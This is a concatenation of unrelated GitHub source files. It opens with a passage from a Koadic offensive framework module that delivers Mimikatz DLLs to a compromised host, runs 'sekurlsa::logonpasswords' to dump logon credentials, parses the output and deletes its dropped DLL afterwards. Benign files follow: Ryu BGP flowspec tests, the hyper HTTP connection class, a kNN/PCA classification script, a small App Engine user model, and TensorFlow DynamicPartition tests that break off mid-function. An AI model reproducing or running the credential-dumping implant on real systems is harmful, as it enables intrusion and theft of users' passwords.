self.options.set("MANIFESTUUID", uuid.uuid4().hex)
self.options.set("SHIMX64UUID", uuid.uuid4().hex)
self.options.set("MIMIX64UUID", uuid.uuid4().hex)
self.options.set("MIMIX86UUID", uuid.uuid4().hex)
self.options.set("MIMICMD", self.options.get("MIMICMD").lower())
self.options.set("SHIMX86BYTES", self.make_arrDLL(self.options.get("SHIMX86DLL")))
self.options.set("DIRECTORY", self.options.get('DIRECTORY').replace("\\", "\\\\").replace('"', '\\"'))
def parse_mimikatz(self, data):
cp = core.cred_parser.CredParse(self)
self.mimi_output = cp.parse_mimikatz(data)
def report(self, handler, data, sanitize = False):
data = data.decode('latin-1')
import binascii
try:
data = binascii.unhexlify(data)
data = data.decode('utf-16-le')
except:
pass
#print(data)
task = handler.get_header(self.options.get("UUIDHEADER"), False)
if task == self.options.get("DLLUUID"):
handler.send_file(self.options.get("DYNWRAPXDLL"))
return
if task == self.options.get("MANIFESTUUID"):
handler.send_file(self.options.get("DYNWRAPXMANIFEST"))
return
if task == self.options.get("SHIMX64UUID"):
handler.send_file(self.options.get("SHIMX64DLL"))
if task == self.options.get("MIMIX64UUID"):
handler.send_file(self.options.get("MIMIX64DLL"))
if task == self.options.get("MIMIX86UUID"):
handler.send_file(self.options.get("MIMIX86DLL"))
if len(data) == 0:
handler.reply(200)
return
if "mimikatz(powershell) # " in data:
self.parse_mimikatz(data)
handler.reply(200)
return
if data == "Complete" and self.errstat != 1:
super(DynWrapXShellcodeJob, self).report(handler, data)
handler.reply(200)
def make_arrDLL(self, path):
import struct
count = 0
ret = ""
with open(path, 'rb') as fileobj:
for chunk in iter(lambda: fileobj.read(4), ''):
if len(chunk) != 4:
break
integer_value = struct.unpack('<I', chunk)[0]
ret += hex(integer_value).rstrip("L") + ","
if count % 20 == 0:
ret += "\r\n"
count += 1
return ret[:-1]
def done(self):
self.results = self.mimi_output if self.mimi_output else ""
self.display()
# deleting dynwrapx.dll, i hate this
time.sleep(1)
plugin = self.shell.plugins['implant/manage/exec_cmd']
old_zombie = plugin.options.get("ZOMBIE")
old_cmd = plugin.options.get("CMD")
old_output = plugin.options.get("OUTPUT")
plugin.options.set("ZOMBIE", self.options.get("ZOMBIE"))
plugin.options.set("CMD", "del /f "+self.options.get("DIRECTORY")+"\\dynwrapx.dll & echo done")
plugin.options.set("OUTPUT", "true")
plugin.run()
plugin.options.set("ZOMBIE", old_zombie)
plugin.options.set("CMD", old_cmd)
plugin.options.set("OUTPUT", old_output)
def display(self):
try:
self.print_good(self.mimi_output)
except:
pass
class DynWrapXShellcodeImplant(core.implant.Implant):
NAME = "Shellcode via Dynamic Wrapper X"
DESCRIPTION = "Executes arbitrary shellcode using the Dynamic Wrapper X COM object"
AUTHORS = ["zerosum0x0", "Aleph-Naught-" "gentilwiki"]
STATE = "implant/inject/mimikatz_dynwrapx"
def load(self):
self.options.register("DIRECTORY", "%TEMP%", "writeable directory on zombie", required=False)
self.options.register("MIMICMD", "sekurlsa::logonpasswords", "What Mimikatz command to run?", required=True)
self.options.register("SHIMX86DLL", "data/bin/mimishim.dll", "relative path to mimishim.dll", required=True, advanced=True)
self.options.register("SHIMX64DLL", "data/bin/mimishim.x64.dll", "relative path to mimishim.x64.dll", required=True, advanced=True)
self.options.register("MIMIX86DLL", "data/bin/powerkatz32.dll", "relative path to powerkatz32.dll", required=True, advanced=True)
self.options.register("MIMIX64DLL", "data/bin/powerkatz64.dll", "relative path to powerkatz64.dll", required=True, advanced=True)
self.options.register("DYNWRAPXDLL", "data/bin/dynwrapx.dll", "relative path to dynwrapx.dll", required=True, advanced=True)
self.options.register("DYNWRAPXMANIFEST", "data/bin/dynwrapx.manifest", "relative path to dynwrapx.manifest", required=True, advanced=True)
self.options.register("UUIDHEADER", "ETag", "HTTP header for UUID", advanced=True)
self.options.register("DLLUUID", "", "HTTP header for UUID", hidden=True)
self.options.register("MANIFESTUUID", "", "UUID", hidden=True)
self.options.register("SHIMX64UUID", "", "UUID", hidden=True)
self.options.register("MIMIX64UUID", "", "UUID", hidden=True)
self.options.register("MIMIX86UUID", "", "UUID", hidden=True)
self.options.register("SHIMX86BYTES", "", "calculated bytes for arr_DLL", hidden=True)
self.options.register("SHIMX86OFFSET", "6202", "Offset to the reflective loader", advanced = True)
def job(self):
return DynWrapXShellcodeJob
def make_arrDLL(self, path):
import struct
count = 0
ret = ""
with open(path, 'rb') as fileobj:
for chunk in iter(lambda: fileobj.read(4), ''):
if len(chunk) != 4:
break
integer_value = struct.unpack('<I', chunk)[0]
ret += hex(integer_value).rstrip("L") + ","
if count % 20 == 0:
ret += "\r\n"
count += 1
return ret[:-1] # strip last comma
def run(self):
workloads = {}
workloads["js"] = "data/implant/inject/mimikatz_dynwrapx.js"
self.dispatch(workloads, self.job)
| {
"content_hash": "56fd98ea804e78bfe47961c180ed9af5",
"timestamp": "",
"source": "github",
"line_count": 164,
"max_line_length": 147,
"avg_line_length": 38.99390243902439,
"alnum_prop": 0.6014073494917904,
"repo_name": "zerosum0x0/koadic",
"id": "d8af460ebd929f61d0f3bbd21b63a278b8f4a722",
"size": "6395",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "modules/implant/inject/mimikatz_dynwrapx.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1153"
},
{
"name": "C",
"bytes": "152727"
},
{
"name": "C#",
"bytes": "4074"
},
{
"name": "C++",
"bytes": "17602"
},
{
"name": "Dockerfile",
"bytes": "192"
},
{
"name": "JavaScript",
"bytes": "99522"
},
{
"name": "Python",
"bytes": "2958758"
},
{
"name": "VBA",
"bytes": "1700"
},
{
"name": "VBScript",
"bytes": "14154"
},
{
"name": "XSLT",
"bytes": "295"
}
],
"symlink_target": ""
} |
import logging
import unittest
from nose.tools import eq_, raises
from ryu.lib.packet.bgp import (
BGPFlowSpecTrafficRateCommunity,
BGPFlowSpecTrafficActionCommunity,
BGPFlowSpecRedirectCommunity,
BGPFlowSpecTrafficMarkingCommunity,
BGPFlowSpecVlanActionCommunity,
BGPFlowSpecTPIDActionCommunity,
)
from ryu.services.protocols.bgp.core import BgpCoreError
from ryu.services.protocols.bgp.utils.bgp import create_v4flowspec_actions
from ryu.services.protocols.bgp.utils.bgp import create_v6flowspec_actions
from ryu.services.protocols.bgp.utils.bgp import create_l2vpnflowspec_actions
LOG = logging.getLogger(__name__)
class Test_Utils_BGP(unittest.TestCase):
"""
Test case for ryu.services.protocols.bgp.utils.bgp
"""
def _test_create_v4flowspec_actions(self, actions, expected_communities):
communities = create_v4flowspec_actions(actions)
expected_communities.sort(key=lambda x: x.subtype)
communities.sort(key=lambda x: x.subtype)
eq_(str(expected_communities), str(communities))
def test_create_v4flowspec_actions_all_actions(self):
actions = {
'traffic_rate': {
'as_number': 0,
'rate_info': 100.0,
},
'traffic_action': {
'action': 3,
},
'redirect': {
'as_number': 10,
'local_administrator': 10,
},
'traffic_marking': {
'dscp': 24,
}
}
expected_communities = [
BGPFlowSpecTrafficRateCommunity(as_number=0, rate_info=100.0),
BGPFlowSpecTrafficActionCommunity(action=3),
BGPFlowSpecRedirectCommunity(as_number=10, local_administrator=10),
BGPFlowSpecTrafficMarkingCommunity(dscp=24),
]
self._test_create_v4flowspec_actions(actions, expected_communities)
def test_create_v4flowspec_actions_without_actions(self):
actions = None
expected_communities = []
self._test_create_v4flowspec_actions(actions, expected_communities)
@raises(ValueError)
def test_create_v4flowspec_actions_not_exist_actions(self):
actions = {
'traffic_test': {
'test': 10,
},
}
expected_communities = []
self._test_create_v4flowspec_actions(actions, expected_communities)
def _test_create_v6flowspec_actions(self, actions, expected_communities):
communities = create_v6flowspec_actions(actions)
expected_communities.sort(key=lambda x: x.subtype)
communities.sort(key=lambda x: x.subtype)
eq_(str(expected_communities), str(communities))
def test_create_v6flowspec_actions_all_actions(self):
actions = {
'traffic_rate': {
'as_number': 0,
'rate_info': 100.0,
},
'traffic_action': {
'action': 3,
},
'redirect': {
'as_number': 10,
'local_administrator': 10,
},
'traffic_marking': {
'dscp': 24,
}
}
expected_communities = [
BGPFlowSpecTrafficRateCommunity(as_number=0, rate_info=100.0),
BGPFlowSpecTrafficActionCommunity(action=3),
BGPFlowSpecRedirectCommunity(as_number=10, local_administrator=10),
BGPFlowSpecTrafficMarkingCommunity(dscp=24),
]
self._test_create_v6flowspec_actions(actions, expected_communities)
def test_create_v6flowspec_actions_without_actions(self):
actions = None
expected_communities = []
self._test_create_v6flowspec_actions(actions, expected_communities)
@raises(ValueError)
def test_create_v6flowspec_actions_not_exist_actions(self):
actions = {
'traffic_test': {
'test': 10,
},
}
expected_communities = []
self._test_create_v6flowspec_actions(actions, expected_communities)
def _test_create_l2vpnflowspec_actions(self, actions, expected_communities):
communities = create_l2vpnflowspec_actions(actions)
expected_communities.sort(key=lambda x: x.subtype)
communities.sort(key=lambda x: x.subtype)
eq_(str(expected_communities), str(communities))
def test_create_l2vpnflowspec_actions_all_actions(self):
actions = {
'traffic_rate': {
'as_number': 0,
'rate_info': 100.0,
},
'traffic_action': {
'action': 3,
},
'redirect': {
'as_number': 10,
'local_administrator': 10,
},
'traffic_marking': {
'dscp': 24,
},
'vlan_action': {
'actions_1': (BGPFlowSpecVlanActionCommunity.POP |
BGPFlowSpecVlanActionCommunity.SWAP),
'vlan_1': 3000,
'cos_1': 3,
'actions_2': BGPFlowSpecVlanActionCommunity.PUSH,
'vlan_2': 4000,
'cos_2': 2,
},
'tpid_action': {
'actions': (BGPFlowSpecTPIDActionCommunity.TI |
BGPFlowSpecTPIDActionCommunity.TO),
'tpid_1': 5,
'tpid_2': 6,
}
}
expected_communities = [
BGPFlowSpecTrafficRateCommunity(as_number=0, rate_info=100.0),
BGPFlowSpecTrafficActionCommunity(action=3),
BGPFlowSpecRedirectCommunity(as_number=10, local_administrator=10),
BGPFlowSpecTrafficMarkingCommunity(dscp=24),
BGPFlowSpecVlanActionCommunity(
actions_1=(BGPFlowSpecVlanActionCommunity.POP |
BGPFlowSpecVlanActionCommunity.SWAP),
vlan_1=3000,
cos_1=3,
actions_2=BGPFlowSpecVlanActionCommunity.PUSH,
vlan_2=4000,
cos_2=2,
),
BGPFlowSpecTPIDActionCommunity(
actions=(BGPFlowSpecTPIDActionCommunity.TI |
BGPFlowSpecTPIDActionCommunity.TO),
tpid_1=5,
tpid_2=6,
),
]
self._test_create_l2vpnflowspec_actions(actions, expected_communities)
def test_create_l2vpnflowspec_actions_without_actions(self):
actions = None
expected_communities = []
self._test_create_l2vpnflowspec_actions(actions, expected_communities)
@raises(ValueError)
def test_create_l2vpnflowspec_actions_not_exist_actions(self):
actions = {
'traffic_test': {
'test': 10,
},
}
expected_communities = []
self._test_create_l2vpnflowspec_actions(actions, expected_communities)
| {
"content_hash": "39f23d0a7335a957e9d149a85468273b",
"timestamp": "",
"source": "github",
"line_count": 195,
"max_line_length": 80,
"avg_line_length": 35.62051282051282,
"alnum_prop": 0.5739994241289951,
"repo_name": "fujita/ryu",
"id": "6933a28b322b9637308498993e887b9c2ba75940",
"size": "7560",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "ryu/tests/unit/services/protocols/bgp/utils/test_bgp.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "28540"
},
{
"name": "CSS",
"bytes": "306"
},
{
"name": "Erlang",
"bytes": "874721"
},
{
"name": "Gnuplot",
"bytes": "1094"
},
{
"name": "HTML",
"bytes": "306"
},
{
"name": "JavaScript",
"bytes": "8436"
},
{
"name": "Makefile",
"bytes": "88"
},
{
"name": "Python",
"bytes": "6135247"
},
{
"name": "Shell",
"bytes": "17573"
}
],
"symlink_target": ""
} |
"""
hyper/common/connection
~~~~~~~~~~~~~~~~~~~~~~~
Hyper's HTTP/1.1 and HTTP/2 abstraction layer.
"""
from .exceptions import TLSUpgrade, HTTPUpgrade
from ..http11.connection import HTTP11Connection
from ..http20.connection import HTTP20Connection
from ..tls import H2_NPN_PROTOCOLS, H2C_PROTOCOL
class HTTPConnection(object):
"""
An object representing a single HTTP connection to a server.
This object behaves similarly to the Python standard library's
``HTTPConnection`` object, with a few critical differences.
Most of the standard library's arguments to the constructor are not
supported by hyper. Most optional parameters apply to *either* HTTP/1.1 or
HTTP/2.
:param host: The host to connect to. This may be an IP address or a
hostname, and optionally may include a port: for example,
``'http2bin.org'``, ``'http2bin.org:443'`` or ``'127.0.0.1'``.
:param port: (optional) The port to connect to. If not provided and one also
isn't provided in the ``host`` parameter, defaults to 443.
:param secure: (optional) Whether the request should use TLS.
Defaults to ``False`` for most requests, but to ``True`` for any
request issued to port 443.
:param window_manager: (optional) The class to use to manage flow control
windows. This needs to be a subclass of the
:class:`BaseFlowControlManager <hyper.http20.window.BaseFlowControlManager>`.
If not provided,
:class:`FlowControlManager <hyper.http20.window.FlowControlManager>`
will be used.
:param enable_push: (optional) Whether the server is allowed to push
resources to the client (see
:meth:`get_pushes() <hyper.HTTP20Connection.get_pushes>`).
:param ssl_context: (optional) A class with custom certificate settings.
If not provided then hyper's default ``SSLContext`` is used instead.
:param proxy_host: (optional) The proxy to connect to. This can be an IP address
or a host name and may include a port.
:param proxy_port: (optional) The proxy port to connect to. If not provided
and one also isn't provided in the ``proxy`` parameter, defaults to 8080.
"""
def __init__(self,
host,
port=None,
secure=None,
window_manager=None,
enable_push=False,
ssl_context=None,
proxy_host=None,
proxy_port=None,
**kwargs):
self._host = host
self._port = port
self._h1_kwargs = {
'secure': secure, 'ssl_context': ssl_context,
'proxy_host': proxy_host, 'proxy_port': proxy_port
}
self._h2_kwargs = {
'window_manager': window_manager, 'enable_push': enable_push,
'secure': secure, 'ssl_context': ssl_context,
'proxy_host': proxy_host, 'proxy_port': proxy_port
}
# Add any unexpected kwargs to both dictionaries.
self._h1_kwargs.update(kwargs)
self._h2_kwargs.update(kwargs)
self._conn = HTTP11Connection(
self._host, self._port, **self._h1_kwargs
)
def request(self, method, url, body=None, headers={}):
"""
This will send a request to the server using the HTTP request method
``method`` and the selector ``url``. If the ``body`` argument is
present, it should be string or bytes object of data to send after the
headers are finished. Strings are encoded as UTF-8. To use other
encodings, pass a bytes object. The Content-Length header is set to the
length of the body field.
:param method: The request method, e.g. ``'GET'``.
:param url: The URL to contact, e.g. ``'/path/segment'``.
:param body: (optional) The request body to send. Must be a bytestring
or a file-like object.
:param headers: (optional) The headers to send on the request.
:returns: A stream ID for the request, or ``None`` if the request is
made over HTTP/1.1.
"""
try:
return self._conn.request(
method=method, url=url, body=body, headers=headers
)
except TLSUpgrade as e:
# We upgraded in the NPN/ALPN handshake. We can just go straight to
# the world of HTTP/2. Replace the backing object and insert the
# socket into it.
assert e.negotiated in H2_NPN_PROTOCOLS
self._conn = HTTP20Connection(
self._host, self._port, **self._h2_kwargs
)
self._conn._sock = e.sock
# Because we skipped the connecting logic, we need to send the
# HTTP/2 preamble.
self._conn._send_preamble()
return self._conn.request(
method=method, url=url, body=body, headers=headers
)
def get_response(self, *args, **kwargs):
"""
Returns a response object.
"""
try:
return self._conn.get_response(*args, **kwargs)
except HTTPUpgrade as e:
# We upgraded via the HTTP Upgrade mechanism. We can just
# go straight to the world of HTTP/2. Replace the backing object
# and insert the socket into it.
assert e.negotiated == H2C_PROTOCOL
self._conn = HTTP20Connection(
self._host, self._port, **self._h2_kwargs
)
self._conn._sock = e.sock
# stream id 1 is used by the upgrade request and response
# and is half-closed by the client
self._conn._new_stream(stream_id=1, local_closed=True)
# HTTP/2 preamble must be sent after receipt of a HTTP/1.1 101
self._conn._send_preamble()
return self._conn.get_response(1)
# The following two methods are the implementation of the context manager
# protocol.
def __enter__(self): # pragma: no cover
return self
def __exit__(self, type, value, tb): # pragma: no cover
self._conn.close()
return False # Never swallow exceptions.
# Can anyone say 'proxy object pattern'?
def __getattr__(self, name):
return getattr(self._conn, name)
| {
"content_hash": "765d0f014eb9a08906f628e45edcacb5",
"timestamp": "",
"source": "github",
"line_count": 155,
"max_line_length": 85,
"avg_line_length": 40.79354838709678,
"alnum_prop": 0.6030365332911592,
"repo_name": "qqzwc/XX-Net",
"id": "a49d3d50e94e4ae7ee3906ef1d5e3d0aec30b0bc",
"size": "6347",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "code/default/python27/1.0/lib/noarch/hyper/common/connection.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "3884"
},
{
"name": "C",
"bytes": "53301"
},
{
"name": "CSS",
"bytes": "86883"
},
{
"name": "HTML",
"bytes": "190128"
},
{
"name": "JavaScript",
"bytes": "6524"
},
{
"name": "Python",
"bytes": "15368059"
},
{
"name": "Shell",
"bytes": "7812"
},
{
"name": "Visual Basic",
"bytes": "1700"
}
],
"symlink_target": ""
} |
from numpy import mean,cov,double,cumsum,dot,linalg,array,rank,size,flipud
from pylab import *
import numpy as np
import matplotlib.pyplot as pp
#from enthought.mayavi import mlab
import scipy.ndimage as ni
import roslib; roslib.load_manifest('sandbox_tapo_darpa_m3')
import rospy
#import hrl_lib.mayavi2_util as mu
import hrl_lib.viz as hv
import hrl_lib.util as ut
import hrl_lib.matplotlib_util as mpu
import pickle
from mvpa.clfs.knn import kNN
from mvpa.datasets import Dataset
from mvpa.clfs.transerror import TransferError
from mvpa.misc.data_generators import normalFeatureDataset
from mvpa.algorithms.cvtranserror import CrossValidatedTransferError
from mvpa.datasets.splitters import NFoldSplitter
import sys
sys.path.insert(0, '/home/tapo/svn/robot1_data/usr/tapo/data_code/Classification/Data/Single_Contact_kNN/6')
from data_6 import Fmat_original
def pca(X):
#get dimensions
num_data,dim = X.shape
#center data
mean_X = X.mean(axis=1)
M = (X-mean_X) # subtract the mean (along columns)
Mcov = cov(M)
print 'PCA - COV-Method used'
val,vec = linalg.eig(Mcov)
#return the projection matrix, the variance and the mean
return vec,val,mean_X, M, Mcov
def my_mvpa(Y,num2):
#Using PYMVPA
PCA_data = np.array(Y)
PCA_label_2 = ['Styrofoam-Fixed']*5 + ['Books-Fixed']*5 + ['Bucket-Fixed']*5 + ['Bowl-Fixed']*5 + ['Can-Fixed']*5 + ['Box-Fixed']*5 + ['Pipe-Fixed']*5 + ['Styrofoam-Movable']*5 + ['Container-Movable']*5 + ['Books-Movable']*5 + ['Cloth-Roll-Movable']*5 + ['Black-Rubber-Movable']*5 + ['Can-Movable']*5 + ['Box-Movable']*5 + ['Rug-Fixed']*5 + ['Bubble-Wrap-1-Fixed']*5 + ['Pillow-1-Fixed']*5 + ['Bubble-Wrap-2-Fixed']*5 + ['Sponge-Fixed']*5 + ['Foliage-Fixed']*5 + ['Pillow-2-Fixed']*5 + ['Rug-Movable']*5 + ['Bubble-Wrap-1-Movable']*5 + ['Pillow-1-Movable']*5 + ['Bubble-Wrap-2-Movable']*5 + ['Pillow-2-Movable']*5 + ['Cushion-Movable']*5 + ['Sponge-Movable']*5
clf = kNN(k=num2)
terr = TransferError(clf)
ds1 = Dataset(samples=PCA_data,labels=PCA_label_2)
cvterr = CrossValidatedTransferError(terr,NFoldSplitter(cvtype=1),enable_states=['confusion'])
error = cvterr(ds1)
return (1-error)*100
def result(eigvec_total,eigval_total,mean_data_total,B,C,num_PC):
# Reduced Eigen-Vector Matrix according to highest Eigenvalues..(Considering First 20 based on above figure)
W = eigvec_total[:,0:num_PC]
m_W, n_W = np.shape(W)
# Normalizes the data set with respect to its variance (Not an Integral part of PCA, but useful)
length = len(eigval_total)
s = np.matrix(np.zeros(length)).T
i = 0
while i < length:
s[i] = sqrt(C[i,i])
i = i+1
Z = np.divide(B,s)
m_Z, n_Z = np.shape(Z)
#Projected Data:
Y = (W.T)*B # 'B' for my Laptop: otherwise 'Z' instead of 'B'
m_Y, n_Y = np.shape(Y.T)
return Y.T
if __name__ == '__main__':
Fmat = Fmat_original[0:82,:]
# Checking the Data-Matrix
m_tot, n_tot = np.shape(Fmat)
print 'Total_Matrix_Shape:',m_tot,n_tot
eigvec_total, eigval_total, mean_data_total, B, C = pca(Fmat)
#print eigvec_total
#print eigval_total
#print mean_data_total
m_eigval_total, n_eigval_total = np.shape(np.matrix(eigval_total))
m_eigvec_total, n_eigvec_total = np.shape(eigvec_total)
m_mean_data_total, n_mean_data_total = np.shape(np.matrix(mean_data_total))
print 'Eigenvalue Shape:',m_eigval_total, n_eigval_total
print 'Eigenvector Shape:',m_eigvec_total, n_eigvec_total
print 'Mean-Data Shape:',m_mean_data_total, n_mean_data_total
#Recall that the cumulative sum of the eigenvalues shows the level of variance accounted by each of the corresponding eigenvectors. On the x axis there is the number of eigenvalues used.
perc_total = cumsum(eigval_total)/sum(eigval_total)
num_PC=1
while num_PC <=20:
Proj = np.zeros((140,num_PC))
Proj = result(eigvec_total,eigval_total,mean_data_total,B,C,num_PC)
# PYMVPA:
num=0
cv_acc = np.zeros(21)
while num <=20:
cv_acc[num] = my_mvpa(Proj,num)
num = num+1
plot(np.arange(21),cv_acc,'-s')
grid('True')
hold('True')
num_PC = num_PC+1
legend(('1-PC', '2-PCs', '3-PCs', '4-PCs', '5-PCs', '6-PCs', '7-PCs', '8-PCs', '9-PCs', '10-PCs', '11-PC', '12-PCs', '13-PCs', '14-PCs', '15-PCs', '16-PCs', '17-PCs', '18-PCs', '19-PCs', '20-PCs'))
ylabel('Cross-Validation Accuracy')
xlabel('k in k-NN Classifier')
show()
| {
"content_hash": "665b85b579ee5f9ef4c261a4e474009e",
"timestamp": "",
"source": "github",
"line_count": 125,
"max_line_length": 664,
"avg_line_length": 36.632,
"alnum_prop": 0.6451190216204411,
"repo_name": "tapomayukh/projects_in_python",
"id": "2d7f9cdf33135d957e74e91a19d247c649d5660d",
"size": "4620",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "classification/Classification_with_kNN/Single_Contact_Classification/Final/best_kNN_PCA/objects/6/test11_cross_validate_objects_6_no_motion_1200ms.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Matlab",
"bytes": "4903"
},
{
"name": "Python",
"bytes": "4451912"
}
],
"symlink_target": ""
} |
from google.appengine.api import users
from google.appengine.ext import ndb
class User(ndb.Model):
email = ndb.StringProperty()
@staticmethod
def checkUser():
googleUser = users.get_current_user()
if not googleUser:
return False
user = User.query(User.email == googleUser.email()).get()
if user:
return user
return False
@staticmethod
def loginUrl():
return users.create_login_url('/connect')
@staticmethod
def logoutUrl():
return users.create_logout_url('/')
@staticmethod
def connect():
googleUser = users.get_current_user()
if googleUser:
user = User()
user.email = googleUser.email()
user.put()
return user
else:
return "not connected" | {
"content_hash": "087251472aeb06f97753714e970c8598",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 59,
"avg_line_length": 17.725,
"alnum_prop": 0.688293370944993,
"repo_name": "racheliel/My-little-business",
"id": "94108701b221e7bce1b10247a1124787076652b7",
"size": "709",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "MyLittleBuisness/models/userGoogle.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ASP",
"bytes": "121753"
},
{
"name": "C#",
"bytes": "93099"
},
{
"name": "CSS",
"bytes": "37559"
},
{
"name": "HTML",
"bytes": "80268"
},
{
"name": "JavaScript",
"bytes": "47333"
},
{
"name": "PowerShell",
"bytes": "3137"
},
{
"name": "Python",
"bytes": "28489"
}
],
"symlink_target": ""
} |
"""Tests for the DynamicPartition op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import gradients_impl
import tensorflow.python.ops.data_flow_grad # pylint: disable=unused-import
from tensorflow.python.platform import test
class DynamicPartitionTest(test.TestCase):
def testSimpleOneDimensional(self):
with self.session(use_gpu=True) as sess:
data = constant_op.constant([0, 13, 2, 39, 4, 17], dtype=dtypes.float32)
indices = constant_op.constant([0, 0, 2, 3, 2, 1])
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=4)
partition_vals = sess.run(partitions)
self.assertEqual(4, len(partition_vals))
self.assertAllEqual([0, 13], partition_vals[0])
self.assertAllEqual([17], partition_vals[1])
self.assertAllEqual([2, 4], partition_vals[2])
self.assertAllEqual([39], partition_vals[3])
# Vector data input to DynamicPartition results in
# `num_partitions` vectors of unknown length.
self.assertEqual([None], partitions[0].get_shape().as_list())
self.assertEqual([None], partitions[1].get_shape().as_list())
self.assertEqual([None], partitions[2].get_shape().as_list())
self.assertEqual([None], partitions[3].get_shape().as_list())
def testSimpleTwoDimensional(self):
with self.session(use_gpu=True) as sess:
data = constant_op.constant([[0, 1, 2], [3, 4, 5], [6, 7, 8], [9, 10, 11],
[12, 13, 14], [15, 16, 17]],
dtype=dtypes.float32)
indices = constant_op.constant([0, 0, 2, 3, 2, 1])
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=4)
partition_vals = sess.run(partitions)
self.assertEqual(4, len(partition_vals))
self.assertAllEqual([[0, 1, 2], [3, 4, 5]], partition_vals[0])
self.assertAllEqual([[15, 16, 17]], partition_vals[1])
self.assertAllEqual([[6, 7, 8], [12, 13, 14]], partition_vals[2])
self.assertAllEqual([[9, 10, 11]], partition_vals[3])
# Vector data input to DynamicPartition results in
# `num_partitions` matrices with an unknown number of rows, and 3 columns.
self.assertEqual([None, 3], partitions[0].get_shape().as_list())
self.assertEqual([None, 3], partitions[1].get_shape().as_list())
self.assertEqual([None, 3], partitions[2].get_shape().as_list())
self.assertEqual([None, 3], partitions[3].get_shape().as_list())
def testLargeOneDimensional(self):
num = 100000
data_list = [x for x in range(num)]
indices_list = [x % 2 for x in range(num)]
part1 = [x for x in range(num) if x % 2 == 0]
part2 = [x for x in range(num) if x % 2 == 1]
with self.session(use_gpu=True) as sess:
data = constant_op.constant(data_list, dtype=dtypes.float32)
indices = constant_op.constant(indices_list, dtype=dtypes.int32)
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=2)
partition_vals = sess.run(partitions)
self.assertEqual(2, len(partition_vals))
self.assertAllEqual(part1, partition_vals[0])
self.assertAllEqual(part2, partition_vals[1])
def testLargeTwoDimensional(self):
rows = 100000
cols = 100
data_list = [None] * rows
for i in range(rows):
data_list[i] = [i for _ in range(cols)]
num_partitions = 97
indices_list = [(i ** 2) % num_partitions for i in range(rows)]
parts = [[] for _ in range(num_partitions)]
for i in range(rows):
parts[(i ** 2) % num_partitions].append(data_list[i])
with self.session(use_gpu=True) as sess:
data = constant_op.constant(data_list, dtype=dtypes.float32)
indices = constant_op.constant(indices_list, dtype=dtypes.int32)
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=num_partitions)
partition_vals = sess.run(partitions)
self.assertEqual(num_partitions, len(partition_vals))
for i in range(num_partitions):
# reshape because of empty parts
parts_np = np.array(parts[i], dtype=np.float).reshape(-1, cols)
self.assertAllEqual(parts_np, partition_vals[i])
def testSimpleComplex(self):
data_list = [1 + 2j, 3 + 4j, 5 + 6j, 7 + 8j]
indices_list = [1, 0, 1, 0]
with self.session(use_gpu=True) as sess:
data = constant_op.constant(data_list, dtype=dtypes.complex64)
indices = constant_op.constant(indices_list, dtype=dtypes.int32)
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=2)
partition_vals = sess.run(partitions)
self.assertEqual(2, len(partition_vals))
self.assertAllEqual([3 + 4j, 7 + 8j], partition_vals[0])
self.assertAllEqual([1 + 2j, 5 + 6j], partition_vals[1])
def testScalarPartitions(self):
data_list = [10, 13, 12, 11]
with self.session(use_gpu=True) as sess:
data = constant_op.constant(data_list, dtype=dtypes.float64)
indices = 3
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=4)
partition_vals = sess.run(partitions)
self.assertEqual(4, len(partition_vals))
self.assertAllEqual(np.array([], dtype=np.float64).reshape(-1, 4),
partition_vals[0])
self.assertAllEqual(np.array([], dtype=np.float64).reshape(-1, 4),
partition_vals[1])
self.assertAllEqual(np.array([], dtype=np.float64).reshape(-1, 4),
partition_vals[2])
self.assertAllEqual(np.array([10, 13, 12, 11],
dtype=np.float64).reshape(-1, 4),
partition_vals[3])
def testHigherRank(self):
np.random.seed(7)
with self.session(use_gpu=True) as sess:
for n in 2, 3:
for shape in (4,), (4, 5), (4, 5, 2):
partitions = np.random.randint(n, size=np.prod(shape)).reshape(shape)
for extra_shape in (), (6,), (6, 7):
data = np.random.randn(*(shape + extra_shape))
partitions_t = constant_op.constant(partitions, dtype=dtypes.int32)
data_t = constant_op.constant(data)
outputs = data_flow_ops.dynamic_partition(
data_t, partitions_t, num_partitions=n)
self.assertEqual(n, len(outputs))
outputs_val = sess.run(outputs)
for i, output in enumerate(outputs_val):
self.assertAllEqual(output, data[partitions == i])
# Test gradients
outputs_grad = [7 * output for output in outputs_val]
grads = gradients_impl.gradients(outputs, [data_t, partitions_t],
outputs_grad)
self.assertEqual(grads[1], None) # Partitions has no gradients
self.assertAllEqual(7 * data, sess.run(grads[0]))
def testEmptyParts(self):
data_list = [1, 2, 3, 4]
indices_list = [1, 3, 1, 3]
with self.session(use_gpu=True) as sess:
data = constant_op.constant(data_list, dtype=dtypes.float32)
indices = constant_op.constant(indices_list, dtype=dtypes.int32)
partitions = data_flow_ops.dynamic_partition(
data, indices, num_partitions=4)
partition_vals = sess.run(partitions)
self.assertEqual(4, len(partition_vals))
self.assertAllEqual([], partition_vals[0])
self.assertAllEqual([1, 3], partition_vals[1])
self.assertAllEqual([], partition_vals[2])
self.assertAllEqual([2, 4], partition_vals[3])
def testEmptyDataTwoDimensional(self):
data_list = [[], []]
indices_list = [0, 1]
with self.session(use_gpu=True) as sess:
